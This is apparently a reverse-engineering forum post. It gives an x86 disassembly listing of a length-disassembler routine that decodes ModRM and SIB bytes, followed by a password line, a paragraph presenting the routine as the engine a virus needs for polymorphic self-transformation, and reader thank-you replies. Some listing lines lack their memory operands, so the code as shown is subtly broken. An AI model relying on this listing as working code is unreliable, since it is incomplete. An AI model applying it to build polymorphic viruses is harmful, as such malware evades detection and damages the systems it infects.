7FF83D45 41 inc ecx
7FF83D46 8AD0 mov dl,al ; keep a copy
7FF83D48 24 C0 and al,0xC0 ; extract mod
7FF83D4A 80E2 07 and dl,0x7
7FF83D4D C0E8 06 shr al,0x6 ; mod now in al
7FF83D50 3C 03 cmp al,0x3 ; mod == 3 is register-direct: no SIB or displacement
7FF83D52 74 5E je short 7FF83DB2
7FF83D54 80BD 09551B00 0>cmp byte ptr ss:,0x0
7FF83D5B 75 1E jnz short 7FF83D7B
7FF83D5D 0AC0 or al,al
7FF83D5F 75 0A jnz short 7FF83D6B
7FF83D61 80FA 06 cmp dl,0x6
7FF83D64 75 05 jnz short 7FF83D6B
7FF83D66 83C1 02 add ecx,0x2
7FF83D69 EB 47 jmp short 7FF83DB2
7FF83D6B 3C 01 cmp al,0x1
7FF83D6D 75 03 jnz short 7FF83D72
7FF83D6F 41 inc ecx
7FF83D70 EB 40 jmp short 7FF83DB2
7FF83D72 3C 02 cmp al,0x2
7FF83D74 75 3C jnz short 7FF83DB2
7FF83D76 83C1 02 add ecx,0x2
7FF83D79 EB 37 jmp short 7FF83DB2
7FF83D7B 80FA 04 cmp dl,0x4 ; r/m field: 4 means a SIB byte follows
7FF83D7E 75 16 jnz short 7FF83D96
7FF83D80 3C 03 cmp al,0x3
7FF83D82 74 12 je short 7FF83D96
7FF83D84 41 inc ecx ; count the SIB byte
7FF83D85 0AC0 or al,al
7FF83D87 75 0D jnz short 7FF83D96
7FF83D89 8A06 mov al,byte ptr ds: ; fetch the SIB byte
7FF83D8B 24 07 and al,0x7 ; base field
7FF83D8D 3C 05 cmp al,0x5 ; base == 5 with mod == 0 means a disp32 instead of a base register
7FF83D8F 75 03 jnz short 7FF83D94
7FF83D91 83C1 04 add ecx,0x4 ; count the disp32
7FF83D94 B0 00 mov al,0x0
7FF83D96 0AC0 or al,al ; mod == 0: no displacement (except r/m == 5: disp32)
7FF83D98 75 0A jnz short 7FF83DA4
7FF83D9A 80FA 05 cmp dl,0x5
7FF83D9D 75 05 jnz short 7FF83DA4
7FF83D9F 83C1 04 add ecx,0x4
7FF83DA2 EB 0E jmp short 7FF83DB2
7FF83DA4 3C 01 cmp al,0x1 ; mod == 1: register plus disp8
7FF83DA6 75 03 jnz short 7FF83DAB
7FF83DA8 41 inc ecx
7FF83DA9 EB 07 jmp short 7FF83DB2
7FF83DAB 3C 02 cmp al,0x2 ; mod == 2: register plus disp32
7FF83DAD 75 03 jnz short 7FF83DB2
7FF83DAF 83C1 04 add ecx,0x4
7FF83DB2 41 inc ecx
7FF83DB3 5E pop esi
7FF83DB4 C3 retn
Password: 52pojie
To implement polymorphism the virus needs a length-disassembler engine; it is indispensable. The main work in writing such an engine is building the table:
classify the instructions, give every class of instruction with the same shape one code, and then one common routine can parse them all.
Once you have the length engine you can tell where each instruction ends, and then apply all kinds of transformations.
Just passing by, no comment.
Passing by, just watching.
Lance, take me with you.
Not skilled enough, this is hard going to read...
Thanks for sharing.
Thanks to the OP for sharing so generously!
Nice, though I didn't understand a word of it.
Thanks for sharing, very nice.
Looks very good, but I didn't understand any of it.